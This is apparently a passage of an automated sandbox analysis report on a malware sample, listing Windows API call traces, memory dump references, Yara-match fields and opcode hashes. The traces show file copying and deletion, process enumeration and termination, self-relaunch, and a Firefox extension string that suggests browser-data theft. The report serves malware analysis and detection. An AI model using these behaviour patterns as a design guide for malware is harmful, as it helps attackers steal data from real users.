                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                            • ExitProcess.KERNEL32 ref: 004169F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 481bee06d242abde933568f013da02446b1876ff8e644cd2aca9f9def8042716
                                            • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                            • Opcode Fuzzy Hash: 481bee06d242abde933568f013da02446b1876ff8e644cd2aca9f9def8042716
                                            • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02406B6A
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 02406C2D
                                            • ExitProcess.KERNEL32 ref: 02406C5C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                            • Instruction ID: 78550ea51aea3cf65082cb37504fb2bca07a0d4f0fa864c4a30aa7db9d535aac
                                            • Opcode Fuzzy Hash: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                            • Instruction Fuzzy Hash: 0C3109B1801228AADB14EB91DD94FDDB77AAF58300F4041AEE205661D0DB746A88CF54
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                            • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                            • wsprintfW.USER32 ref: 00418F08
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesswsprintf
                                            • String ID: %hs
                                            • API String ID: 659108358-2783943728
                                            • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                            • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                            • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                            • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                            • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: 9ac3cb0069b46d5fc6777aa9344fb252c67a0740c7fdcaa052c39dc2df181915
                                            • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                            • Opcode Fuzzy Hash: 9ac3cb0069b46d5fc6777aa9344fb252c67a0740c7fdcaa052c39dc2df181915
                                            • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023FAC78
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 023FAD96
                                            • lstrlen.KERNEL32(00000000), ref: 023FB053
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023FA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 023FA7E4
                                            • DeleteFileA.KERNEL32(00000000), ref: 023FB0DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                            • Instruction ID: 97ae8641cbcfa3554cf7b0895e1eb2b00fe109888b22618bf1d4d97383bab991
                                            • Opcode Fuzzy Hash: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                            • Instruction Fuzzy Hash: 9EE1BE728502289ACB19FBA5DCD4DEE733AAF54305F50856EE656720D0EF306A8CCF61
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 47f2e644d34e8f28790d8eb9a2f5f085194dd291f3c92e660b04cfa29a906f22
                                            • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                            • Opcode Fuzzy Hash: 47f2e644d34e8f28790d8eb9a2f5f085194dd291f3c92e660b04cfa29a906f22
                                            • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023FD7E8
                                            • lstrlen.KERNEL32(00000000), ref: 023FD9FF
                                            • lstrlen.KERNEL32(00000000), ref: 023FDA13
                                            • DeleteFileA.KERNEL32(00000000), ref: 023FDA92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                            • Instruction ID: e178ba0f43e522dbe33b0d49399e753cd5872beef35ca996b1e4dc8e056de3e2
                                            • Opcode Fuzzy Hash: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                            • Instruction Fuzzy Hash: 0091FC729002289BCB18FBA5DCD4DEE733AAF54305F50457EE616660D0EF346A88CFA1
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                            • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                            • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 19c5b6564075ebd3ab9335920b417599cb92f082d03097641c376dd5bdeb35e5
                                            • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                            • Opcode Fuzzy Hash: 19c5b6564075ebd3ab9335920b417599cb92f082d03097641c376dd5bdeb35e5
                                            • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023FDB68
                                            • lstrlen.KERNEL32(00000000), ref: 023FDD06
                                            • lstrlen.KERNEL32(00000000), ref: 023FDD1A
                                            • DeleteFileA.KERNEL32(00000000), ref: 023FDD99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                            • Instruction ID: 9854b5fd4356986c73c943fba2ac568c1b1d9906f5c98b980e88ed8883698359
                                            • Opcode Fuzzy Hash: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                            • Instruction Fuzzy Hash: 458102729102289BCB18FBA5DCD4DEE733AAF54304F50457EE656660D0EF346A88CFA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                            • Instruction ID: 63fede9d19a03aff4264b77b6ab622682cf5f74ce0cc511a21d389dacf9c2b56
                                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                            • Instruction Fuzzy Hash: 53510672601602AFDB298F15E858BBA73A6FF60314F16411FD88747E90D731E889CB92
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                            • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                            • API String ID: 998311485-3310892237
                                            • Opcode ID: 83c650cfc0269a93a35d01ef34d01443e55d62c7944c2c18c59c250d51bf75a0
                                            • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                            • Opcode Fuzzy Hash: 83c650cfc0269a93a35d01ef34d01443e55d62c7944c2c18c59c250d51bf75a0
                                            • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                            APIs
                                            • memset.MSVCRT ref: 0041967B
                                              • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                              • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                              • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
                                            • CloseHandle.KERNEL32(00000000), ref: 00419766
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 396451647-0
                                            • Opcode ID: 990b109b9c0dd8af683ffe9626c1f8c662ba6a203f1ed4cb28493b1b2a66ffaa
                                            • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                            • Opcode Fuzzy Hash: 990b109b9c0dd8af683ffe9626c1f8c662ba6a203f1ed4cb28493b1b2a66ffaa
                                            • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                            APIs
                                            • memset.MSVCRT ref: 024098E2
                                              • Part of subcall function 02409147: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02409915,00000000), ref: 02409152
                                              • Part of subcall function 02409147: RtlAllocateHeap.NTDLL(00000000), ref: 02409159
                                              • Part of subcall function 02409147: wsprintfW.USER32 ref: 0240916F
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 024099A2
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 024099C0
                                            • CloseHandle.KERNEL32(00000000), ref: 024099CD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 3729781310-0
                                            • Opcode ID: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                            • Instruction ID: 582be75a0f8f6a0ee9b270367503e9700e8a17a10e25532023da8554962f43a0
                                            • Opcode Fuzzy Hash: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                            • Instruction Fuzzy Hash: 5E310AB1E01258ABDB14DFE0CD88BEDB775FB44700F50456AE506AA2C4EB745A88CF51
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 02408AC1
                                            • Process32First.KERNEL32(?,00000128), ref: 02408AD5
                                            • Process32Next.KERNEL32(?,00000128), ref: 02408AEA
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • CloseHandle.KERNEL32(?), ref: 02408B58
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                            • Instruction ID: ecde6d6786db25c0ede9d817b9a75de253cda1366daed2b8c29395dcca93d475
                                            • Opcode Fuzzy Hash: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                            • Instruction Fuzzy Hash: 6F314471941268ABCB24EF55DD84FEEB779EF44705F1045AEE20AA2190EB346F84CF90
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                            • wsprintfA.USER32 ref: 004189E0
